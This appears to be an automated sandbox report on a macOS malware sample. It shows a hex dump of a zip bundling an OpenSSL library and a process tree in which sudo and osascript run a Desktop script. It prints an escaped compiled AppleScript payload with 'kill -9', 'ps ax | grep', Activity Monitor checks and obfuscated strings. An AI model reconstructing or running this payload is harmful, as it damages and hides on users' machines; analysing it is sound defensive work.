                                Data Raw: 50 4b 03 04 0a 00 00 00 00 00 68 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 08 00 10 00 6f 70 65 6e 73 73 6c 2f 55 58 0c 00 24 68 25 5e 24 68 25 5e f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 84 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 55 58 0c 00 58 68 25 5e 58 68 25 5e f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 1d 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 21 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 6c 69 62 63 72 79 70 74 6f 2e 31 2e 30 2e 30 2e 64 79 6c 69 62 55 58 0c 00 9a 67 25 5e 9a 67 25 5e f5 01 14 00 ec bd 0b 7c 54 d5 b5 30 3e 93 4c 92 09 99 b0 07 89 18 35 40 d0 68 c1 a2 e6 38 68 a1 45 9b 03 33 72 06 67 20 15 10 ab 20 28 12 b1 02 49 21 11 ed 95 e7 24 9a dd e3 68 ea ab f4 5a af b4 b5 b7 f6 71 bf 8b da a6 88 15 67 02 e4 85 40 c2 23 84 57 12 de 13 02 4c 20 3c c2 2b f3 ad b5 f6 99 67 c2 43 7b ef f7 ff fd fe bf 06 66 ce 7e ae bd d6 da eb b5 f7 d9 e7 cc e6 0b c7 bb 92 74 3a 7d bc 4e a7 4b 84 4f 2a 7c 3c 90 28 d1 99 75 f8 77 33 7c 06 c7 e9 74 d3 a6 4d b4 3d 3e 51 d7 fd 6f c9 ad 3d e6 13 b4 4f a2 56 3c 6d 5a e1 cc 97 0a c3 cd ba c1 13 c3 e9 66 0d bf 29 94 37 45 c2 35 e8 96 44 66 a7 4d 9b 5f 58 f4 cc fc 2b c2 9b a5 08 38 89 f1 e1 bc 3e a2 bf 51 83 17 c6 0f e1 4d 9b 35 73 76 c1 cc 79 3d c0 2b 78 44 c0 bb 25 21 9c 8f bb 2a 7e 33 f2 e7 ce 2f 8c c8 47 c3 f3 e4 0a 78 d5 e3 e2 42 f9 44 dd 95 ff 00 de fc c2 79 cf cf 7d ee 0a f0 ca 3e bc 99 ae 07 ff a4 0f e5 0d 11 fd a3 70 a5 fe 45 73 17 3c 3f f7 d9 69 cf cf cd cb ef 01 5e e1 58 31 8f cb 87 86 f3 b1 30 22 ff 70 f4 6a 92 13 ab 3c 51 8e a8 08 ca 47 4b 5c 74 7e a5 c8 c7 6b 1f 63 08 af b9 b3 a7 cd 7f 79 ce 33 f9 b3 a7 15 14 ce bb 22 3c 63 44 3e 3e a2 1a 79 b8 34 8a ce e7 f2 0b a3 f2 d1 f0 8c 1a bc 15 11 f9 58 78 cb a2 fa cf 7e fa 6a f8 7d 1c c4 cf 10 ce 47 c2 03 5d d3 bd 17 05 6f 4e 3e 4e c2 f3 85 d3 f2 8a e6 ce e8 06 6f 65 71 34 bd 98 8f 84 97 ac 8b fe eb 2e 77 d1 f0 3c 1a bc e9 3f 8f 0b e5 0d ba 2b ff 4d 9b f6 ec d3 85 4f 47 e6 a3 e1 65 b2 01 74 35 df 1c ce 5f 1d de 33 f3 e7 47 e5 a3 e1 65 0f 16 f0 72 ee 0b 97 45 c2 8b d4 61 d1 7f 46 fe 9c 39 f9 73 af 04 af e0 09 01 2f 3b a2 4f 24 ff 62 e1 21 19 0a c1 71 d8 c7 3d 62 b3 da 83 3a 31 7d 80 96 d0 b4 34 5b e4 87 06 12 42 70 22 61 a1 1d 9d 0e 9f f4 60 b9 5e 4f 9f 9c 99 2f cd 9c 51 54 f8 f4 33 b3 67 4e 2b 78 ba 70 d6 bd f9 05 33 e7 ce 9f 3f fb de d9 cf 3f 83 9f 19 f3 5e 2e 28 cc bf 47 ba 27 1b fe 3d fb 32 94 e8 7a fc bb 0d 24 3f 5b c3 43 c9 04 9c 73 07 e8 5e 8a a8 f7 40 be 1a 84 a6 f4 c7 03 74 b3 de d6 93 ee 22 2e ed e6 4c 9d da 5f a7 bb 74 7c 90 2e 5b 8e d3 a5 40 59 ae d6 e7 b8 51 7c d2 d3 c0 76 43 9b 57 7b 1e 9a fe 56 b4 0e d2 dd 14 cb 3c f8 bb 55 1b e7 e7 23 d8 c4 5f 8f fe 7e bf 4f 7e d5 ff f9 27 fa 6e 74 65 e9 34 13 9f dc 4b a7 eb dd 4b 77 97 2e 64 f2 e9 0f 6d fd 70 ad 2f e2 aa bf 70 d0 80 9c bb b7 68 fe bc 20 6f 26 bc 3c bf 70 e6 9c 7b 46 45 f2 e5 4e 0d 4e fb b1 81 ba 97 80 0f 43 b4 fc ac d4 4c 5d 69 e4 44 ff eb ef 5f 7f ff fa fb d7 df bf fe fe f5 f7 af bf 7f fd fd eb 8f fe 26 29 fc 90 ad a4 a6 30 d5 e1 4e 35 43 68 3b b5 b5 b6 a9 b7 0e 32 07 92 31 73 f7 81 de ba b2 c8 3f 6c 6f 55 27 99 15 77 c2 3e 88 7c 73 e5 47 7d 7f d4 31 9d e2 5a 67 9e ba 96 0d d4 45 d4 7b b5 fa 5f 25 f5 5c ff 1b ad be c6 18 ac d7 e0 cb 93 e5 c7 e4 49 f2
                                Data Ascii: PKh4Popenssl/UX$h%^$h%^PK4Popenssl/lib/UXXh%^Xh%^PK4P!openssl/lib/libcrypto.1.0.0.dylibUXg%^g%^|T0>L5@h8hE3rg (I!$hZqg@#WL <+gC{f~t:}NKO*|<(uw3|tM=>Qo=OV<mZf)7E5DfM_X+8>QM5svy=+xD%!*~3/GxBDy}>pEs<?i^X10"pj<QGK\t~kcy3"<cD>>y4Xx~j}G]oN>Noeq4.w<?+MOGet5_3GerEaF9s/;O$b!q=b:1}4[Bp"a`^O/QT3gN+xp3??^.(G'=2z$?[Cs^@t".L_t|.[@YQ|vCW{V<U#_~O~'nte4KKw.dmp/ph o&<p{FENNCL]iD_&)0N5Ch;21s?loU'w>|sG}1ZgE{_%\I


                                System Behavior

                                Analysis Process: mono-sgen32 PID: 547 Parent PID: 498

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
                                Arguments:n/a
                                File size:3722408 bytes
                                MD5 hash:8910349f44a940d8d79318367855b236

                                Chronological Activities

                                Analysis Process: sudo PID: 547 Parent PID: 498

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/usr/bin/sudo
                                Arguments:
                                File size:365760 bytes
                                MD5 hash:60ac5909d06d86e22aace3a863b13690

                                Chronological Activities

                                Analysis Process: sudo PID: 548 Parent PID: 547

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/usr/bin/sudo
                                Arguments:n/a
                                File size:365760 bytes
                                MD5 hash:60ac5909d06d86e22aace3a863b13690

                                Chronological Activities

                                Analysis Process: osascript PID: 548 Parent PID: 547

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:osascript /Users/henry/Desktop/gqnmir4Hus.scpt
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: osascript PID: 549 Parent PID: 548

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 549 Parent PID: 548

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c printf '%b' '\x46\x61\x73\x64\x55\x41\x53\x20\x31\x2E\x31\x30\x31\x2E\x31\x30\x0E\x00\x00\x00\x04\x0F\xFF\xFF\xFF\xFE\x00\x01\x00\x02\x01\xFF\xFF\x00\x00\x01\xFF\xFE\x00\x00\x0E\x00\x01\x00\x00\x0F\x10\x00\x02\x00\x06\xFF\xFD\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x01\xFF\xFD\x00\x00\x10\x00\x03\x00\x04\xFF\xFC\xFF\xFB\xFF\xFA\xFF\xF9\x0B\xFF\xFC\x00\x05\x30\x00\x01\x65\x00\x00\x0B\xFF\xFB\x00\x05\x30\x00\x01\x64\x00\x00\x0B\xFF\xFA\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x0A\xFF\xF9\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x0E\x00\x04\x00\x07\x10\xFF\xF8\xFF\xF7\xFF\xF6\xFF\xF5\x00\x08\x00\x09\xFF\xF4\x0B\xFF\xF8\x00\x05\x30\x00\x01\x65\x00\x00\x01\xFF\xF7\x00\x00\x0E\xFF\xF6\x00\x02\x04\xFF\xF3\x00\x0A\x03\xFF\xF3\x00\x01\x0E\x00\x0A\x00\x01\x00\xFF\xF2\x0B\xFF\xF2\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xF5\x00\x00\x10\x00\x08\x00\x03\xFF\xF1\xFF\xF0\xFF\xEF\x0B\xFF\xF1\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xF0\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xEF\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x09\x00\x08\xFF\xEE\xFF\xED\xFF\xEC\xFF\xEB\xFF\xEA\xFF\xE9\xFF\xE8\xFF\xE7\x0A\xFF\xEE\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xED\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xEC\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xEB\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xEA\x00\x64\x0A\xFF\xE9\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xE8\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xE7\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xF4\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1E\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x05\x00\x07\x10\xFF\xE6\xFF\xE5\xFF\xE4\xFF\xE3\x00\x0B\x00\x0C\xFF\xE2\x0B\xFF\xE6\x00\x05\x30\x00\x01\x64\x00\x00\x01\xFF\xE5\x00\x00\x0E\xFF\xE4\x00\x02\x04\xFF\xE1\x00\x0D\x03\xFF\xE1\x00\x01\x0E\x00\x0D\x00\x01\x00\xFF\xE0\x0B\xFF\xE0\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xE3\x00\x00\x10\x00\x0B\x00\x03\xFF\xDF\xFF\xDE\xFF\xDD\x0B\xFF\xDF\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xDE\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xDD\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x0C\x00\x08\xFF\xDC\xFF\xDB\xFF\xDA\xFF\xD9\xFF\xD8\xFF\xD7\xFF\xD6\xFF\xD5\x0A\xFF\xDC\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xDB\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xDA\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xD9\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xD8\x00\x64\x0A\xFF\xD7\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xD6\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xD5\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xE2\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1F\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x06\x00\x07\x10\xFF\xD4\xFF\xD3\xFF\xD2\xFF\xD1\x00\x0E\x00\x0F\xFF\xD0\x0B\xFF\xD4\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xD3\x00\x00\x0E\xFF\xD2\x00\x02\x04\xFF\xCF\x00\x10\x03\xFF\xCF\x00\x01\x0E\x00\x10\x00\x01\x00\xFF\xCE\x0B\xFF\xCE\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x02\xFF\xD1\x00\x00\x10\x00\x0E\x00\x02\xFF\xCD\xFF\xCC\x0B\xFF\xCD\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x0B\xFF\xCC\x00\x07\x30\x00\x03\x5F\x69\x64\x00\x00\x10\x00\x0F\x00\x08\x00\x11\xFF\xCB\x00\x12\xFF\xCA\x00\x13\x00\x14\xFF\xC9\xFF\xC8\x0E\x00\x11\x00\x01\xB1\x00\x15\x11\x00\x15\x00\x1A\x00\x70\x00\x73\x00\x20\x00\x61\x00\x78\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x0A\xFF\xCB\x00\x04\x0A\x73\x74\x72\x71\x0E\x00\x12\x00\x01\xB1\x00\x16\x11\x00\x16\x00\x44\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x2D\x00\x76\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x7C\x00\x20\x00\x61\x00\x77\x00\x6B\x00\x20\x00\x27\x00\x7B\x00\x70\x00\x72\x00\x69\x00\x6E\x00\x74\x00\x20\x00\x24\x00\x31\x00\x7D\x00\x27\x0A\xFF\xCA\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0E\x00\x13\x00\x01\xB1\x00\x17\x11\x00\x17\x00\x00\x0E\x00\x14\x00\x01\xB1\x00\x18\x11\x00\x18\x00\x10\x00\x6B\x00\x69\x00\x6C\x00\x6C\x00\x20\x00\x2D\x00\x39\x00\x20\x01\xFF\xC9\x00\x00\x02\xFF\xC8\x00\x00\x11\xFF\xD0\x00\x2C\x14\x00\x24\xE0\xA0\xE1\x2C\x25\xE2\x25\x6A\x0C\x00\x03\x45\xB1\x4F\xA1\xE4\x01\x1D\x00\x0C\xE5\xA1\x25\x6A\x0C\x00\x03\x59\x00\x03\x68\x57\x00\x08\x58\x00\x06\x00\x07\x68\x0F\x0E\x00\x07\x00\x07\x10\xFF\xC7\xFF\xC6\xFF\xC5\xFF\xC4\x00\x19\x00\x1A\xFF\xC3\x0A\xFF\xC7\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x01\xFF\xC6\x00\x00\x01\xFF\xC5\x00\x00\x02\xFF\xC4\x00\x00\x10\x00\x19\x00\x01\xFF\xC2\x0B\xFF\xC2\x00\x05\x30\x00\x01\x69\x00\x00\x10\x00\x1A\x00\x30\x00\x1B\xFF\xC1\xFF\xC0\x00\x1C\xFF\xBF\x00\x1D\x00\x1E\xFF\xBE\xFF\xBD\xFF\xBC\x00\x1F\xFF\xBB\xFF\xBA\xFF\xB9\xFF\xB8\x00\x20\xFF\xB7\xFF\xB6\xFF\xB5\x00\x21\xFF\xB4\xFF\xB3\xFF\xB2\xFF\xB1\x00\x22\x00\x23\x00\x24\xFF\xB0\xFF\xAF\xFF\xAE\xFF\xAD\xFF\xAC\xFF\xAB\x00\x25\xFF\xAA\xFF\xA9\xFF\xA8\x00\x26\x00\x27\x00\x28\xFF\xA7\x00\x29\x00\x2A\x00\x2B\x00\x2C\x00\x2D\x00\x2E\x00\x2F\x0E\x00\x1B\x00\x01\xB1\x00\x30\x11\x00\x30\x00\x08\x00\x83\x00\x90\x00\x60\x00\x99\x0B\xFF\xC1\x00\x06\x30\x00\x02\x6D\x73\x00\x00\x0B\xFF\xC0\x00\x05\x30\x00\x01\x6E\x00\x00\x08\x00\x1C\x00\x08\x3F\xC9\x99\x99\x99\x99\x99\x9A\x0A\xFF\xBF\x00\x18\x2E\x73\x79\x73\x6F\x64\x65\x6C\x61\x6E\x75\x6C\x6C\xFF\xFF\x80\x00\xFF\xFF\x80\x00\x6E\x6D\x62\x72\x0F\x00\x1D\x01\xD4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x65\x76\x73\x00\x02\x01\x00\x61\x6C\x69\x73\x00\x00\x00\x00\x01\x76\x00\x02\x00\x01\x03\x4D\x41\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCE\xA2\xE5\x88\x48\x2B\x00\x00\x00\x00\x00\x30\x11\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x30\x61\xCC\x08\x6F\x49\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x09\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x00\x10\x00\x08\x00\x00\xCE\xA2\x75\x08\x00\x00\x00\x11\x00\x08\x00\x00\xCC\x07\xFE\xC9\x00\x00\x00\x01\x00\x0C\x00\x00\x00\x30\x00\x00\x00\x2A\x00\x00\x00\x29\x00\x02\x00\x34\x4D\x41\x43\x3A\x53\x79\x73\x74\x65\x6D\x3A\x00\x4C\x69\x62\x72\x61\x72\x79\x3A\x00\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x3A\x00\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x0E\x00\x24\x00\x11\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6D\x00\x20\x00\x45\x00\x76\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x2E\x00\x61\x00\x70\x00\x70\x00\x0F\x00\x08\x00\x03\x00\x4D\x00\x41\x00\x43\x00\x12\x00\x2D\x53\x79\x73\x74\x65\x6D\x2F\x4C\x69\x62\x72\x61\x72\x79\x2F\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x2F\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x13\x00\x01\x2F\x00\xFF\xFF\x00\x00\x0E\x00\x1E\x00\x01\xB1\x00\x31\x11\x00\x31\x00\x20\x00\x41\x00\x63\x00\x74\x00\x69\x00\x76\x00\x69\x00\x74\x00\x79\x00\x20\x00\x4D\x00\x6F\x00\x6E\x00\x69\x00\x74\x00\x6F\x00\x72\x0B\xFF\xBE\x00\x05\x30\x00\x01\x73\x00\x00\x0A\xFF\xBD\x00\x04\x0A\x70\x63\x61\x70\x0A\xFF\xBC\x00\x18\x2E\x63\x6F\x72\x65\x64\x6F\x65\x78\x62\x6F\x6F\x6C\x00\x00\x00\x00\x00\x00\x10\x00\x6F\x62\x6A\x20\x0E\x00\x1F\x00\x01\xB1\x00\x32\x11\x00\x32\x00\x08\x00\x2E\x00\x61\x00\x70\x00\x70\x0B\xFF\xBB\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xBA\x00\x00\x02\xFF\xB9\x00\x00\x03\xFF\xB8\x00\x0A\x0E\x00\x20\x00\x01\xB1\x00\x33\x11\x00\x33\x00\xD4\x00\xD4\x00\xD7\x00\x84\x00\xC5\x00\xDC\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xA9\x00\x84\x00\x8B\x00\x97\x00\x9A\x00\x94\x00\xE0\x00\xAF\x00\xC9\x00\xC9\x00\xD4\x00\xC9\x00\xD6\x00\xE0\x00\xB1\x00\xC5\x00\xC7\x00\xB1\x00\xCB\x00\xD6\x00\xE0\x00\xB0\x00\xC9\x00\xD1\x00\xD3\x00\xD2\x00\xE0\x00\xB1\x00\xC5\x00\xD0\x00\xDB\x00\xC5\x00\xD6\x00\xC9\x00\xE0\x00\xA5\x00\xDA\x00\xC5\x00\xD7\x00\xD8\x00\xE0\x00\xA5\x00\xDA\x00\xCD\x00\xD6\x00\xC5\x00\xE0\x00\xA7\x00\xD0\x00\xC9\x00\xC5\x00\xD2\x00\xB1\x00\xDD\x00\xB1\x00\xC5\x00\xC7\x00\x8B\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xDA\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\xE0\x00\x84\x00\xC5\x00\xDB\x00\xCF\x00\x84\x00\x8B\x00\xDF\x00\xD4\x00\xD6\x00\xCD\x00\xD2\x00\xD8\x00\x84\x00\x88\x00\x95\x00\xE1\x00\x8B\x0B\xFF\xB7\x00\x05\x30\x00\x01\x64\x00\x00\x0A\xFF\xB6\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0B\xFF\xB5\x00\x05\x30\x00\x01\x70\x00\x00\x0E\x00\x21\x00\x01\xB1\x00\x34\x11\x00\x34\x00\x00\x0A\xFF\xB4\x00\x04\x0A\x63\x70\x61\x72\x0A\xFF\xB3\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xB2\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xB1\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x0E\x00\x22\x00\x01\xB1\x00\x35\x11\x00\x35\x00\x10\x00\xCF\x00\xCD\x00\xD0\x00\xD0\x00\x84\x00\x91\x00\x9D\x00\x84\x0E\x00\x23\x00\x01\xB1\x00\x36\x11\x00\x36\x00\x12\x00\x49\x00\x6E\x00\x73\x00\x74\x00\x61\x00\x6C\x00\x6C\x00\x65\x00\x72\x0E\x00\x24\x00\x01\xB1\x00\x37\x11\x00\x37\x00\x28\x00\x93\x00\xDA\x00\xC5\x00\xD6\x00\x93\x00\xD0\x00\xD3\x00\xCB\x00\x93\x00\xCD\x00\xD2\x00\xD7\x00\xD8\x00\xC5\x00\xD0\x00\xD0\x00\x92\x00\xD0\x00\xD3\x00\xCB\x0A\xFF\xB0\x00\x18\x2E\x72\x64\x77\x72\x6F\x70\x65\x6E\x73\x68\x6F\x72\x00\x00\x00\x00\x00\x00\x08\x00\x66\x69\x6C\x65\x0B\xFF\xAF\x00\x06\x30\x00\x02\x66\x70\x00\x00\x0A\xFF\xAE\x00\x18\x2E\x72\x64\x77\x72\x72\x65\x61\x64\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x2A\x2A\x2A\x2A\x0B\xFF\xAD\x00\x06\x30\x00\x02\x66\x73\x00\x00\x0A\xFF\xAC\x00\x18\x2E\x72\x64\x77\x72\x63\x6C\x6F\x73\x6E\x75\x6C\x6C\xFF\xFF\x80\x00\x00\x00\x00\x00\x2A\x2A\x2A\x2A\x0B\xFF\xAB\x00\x06\x30\x00\x02\x66\x6E\x00\x00\x0E\x00\x25\x00\x01\xB1\x00\x38\x11\x00\x38\x00\x00\x0B\xFF\xAA\x00\x06\x30\x00\x02\x6C\x73\x00\x00\x03\xFF\xA9\x00\x14\x0A\xFF\xA8\x00\x04\x0A\x72\x65\x74\x20\x0E\x00\x26\x00\x01\xB1\x00\x39\x11\x00\x39\x00\x20\x00\xAD\x00\xD2\x00\xD7\x00\xD8\x00\xC5\x00\xD0\x00\xD0\x00\xC5\x00\xD8\x00\xCD\x00\xD3\x00\xD2\x00\x84\x00\xB0\x00\xD3\x00\xCB\x0E\x00\x27\x00\x01\xB1\x00\x3A\x11\x00\x3A\x00\x06\x00\x97\x00\x9A\x00\x94\x0E\x00\x28\x00\x01\xB1\x00\x3B\x11\x00\x3B\x00\x0C\x00\xAF\x00\xC9\x00\xC9\x00\xD4\x00\xC9\x00\xD6\x0A\xFF\xA7\x00\x04\x0A\x62\x6F\x6F\x6C\x0E\x00\x29\x00\x01\xB1\x00\x3C\x11\x00\x3C\x00\x0C\x00\xB1\x00\xC5\x00\xC7\x00\xB1\x00\xCB\x00\xD6\x0E\x00\x2A\x00\x01\xB1\x00\x3D\x11\x00\x3D\x00\x0A\x00\xB0\x00\xC9\x00\xD1\x00\xD3\x00\xD2\x0E\x00\x2B\x00\x01\xB1\x00\x3E\x11\x00\x3E\x00\x0E\x00\xB1\x00\xC5\x00\xD0\x00\xDB\x00\xC5\x00\xD6\x00\xC9\x0E\x00\x2C\x00\x01\xB1\x00\x3F\x11\x00\x3F\x00\x0A\x00\xA5\x00\xDA\x00\xC5\x00\xD7\x00\xD8\x0E\x00\x2D\x00\x01\xB1\x00\x40\x11\x00\x40\x00\x0A\x00\xA5\x00\xDA\x00\xCD\x00\xD6\x00\xC5\x0E\x00\x2E\x00\x01\xB1\x00\x41\x11\x00\x41\x00\x14\x00\xA7\x00\xD0\x00\xC9\x00\xC5\x00\xD2\x00\xB1\x00\xDD\x00\xB1\x00\xC5\x00\xC7\x0E\x00\x2F\x00\x01\xB1\x00\x42\x11\x00\x42\x00\x08\x00\x2E\x00\x61\x00\x70\x00\x70\x11\xFF\xC3\x02\x14\xE0\x45\xD1\x4F\x6A\x45\xD2\x4F\x17\x02\x0A\x68\x5A\xE3\x6A\x0C\x00\x04\x4F\xC2\x6B\x1E\x45\xD2\x4F\x14\x00\x25\xE5\x12\x00\x1D\xE6\x45\xD7\x4F\x2A\xE8\xC7\x2F\x6A\x0C\x00\x09\x1D\x00\x0D\x29\xC7\xEA\x25\x6B\x2B\x00\x0B\x59\x00\x03\x68\x55\x57\x00\x08\x58\x00\x0C\x00\x0D\x68\x4F\xC2\xEE\x03\x1D\x01\xC3\x6A\x45\xD2\x4F\x14\x00\x63\x2A\xEF\x6B\x2B\x00\x10\x6A\x0C\x00\x11\x45\x60\x00\x12\x4F\x5F\x00\x12\x61\x00\x13\x01\x1D\x00\x46\x5F\x00\x12\x61\x00\x14\x2D\x45\x60\x00\x12\x4F\x17\x00\x34\x5F\x00\x12\x5B\x61\x00\x15\x61\x00\x16\x6C\x0C\x00\x17\x6B\x68\x1B\x00\x00\x14\x00\x13\x2A\x61\x00\x18\x6B\x2B\x00\x10\xA0\x25\x6A\x0C\x00\x11\x57\x00\x08\x58\x00\x0C\x00\x0D\x68\x5B\x4F\x59\xFF\xE0\x59\x00\x03\x68\x57\x00\x08\x58\x00\x0C\x00\x0D\x68\x4F\x14\x01\x48\xE5\x12\x01\x40\x61\x00\x19\x45\xD7\x4F\x2A\xE8\xC7\x2F\x6A\x0C\x00\x09\x1D\x01\x2E\x29\x61\x00\x1A\x6B\x2B\x00\x10\x6A\x0C\x00\x1B\x45\x60\x00\x1C\x4F\x5F\x00\x1C\x6A\x0C\x00\x1D\x45\x60\x00\x1E\x4F\x5F\x00\x1C\x6A\x0C\x00\x1F\x4F\x5F\x00\x1E\x61\x00\x14\x2D\x45\x60\x00\x1E\x4F\x5F\x00\x1E\x6A\x0C\x00\x17\x45\x60\x00\x20\x4F\x61\x00\x21\x45\x60\x00\x22\x4F\x17\x00\x2D\x61\x00\x23\x6B\x68\x18\x5F\x00\x22\x5F\x00\x1E\x61\x00\x16\x5F\x00\x20\x2F\x25\x5F\x00\x24\x25\x45\x60\x00\x22\x4F\x5F\x00\x20\x6B\x1F\x45\x60\x00\x20\x5B\x4F\x59\xFF\xDC\x4F\x5F\x00\x22\x29\x61\x00\x25\x6B\x2B\x00\x10\x08\x09\x00\x97\x5F\x00\x22\x29\x61\x00\x26\x6B\x2B\x00\x10\x08\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x27\x6B\x2B\x00\x10\x08\x61\x00\x28\x26\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x29\x6B\x2B\x00\x10\x08\x6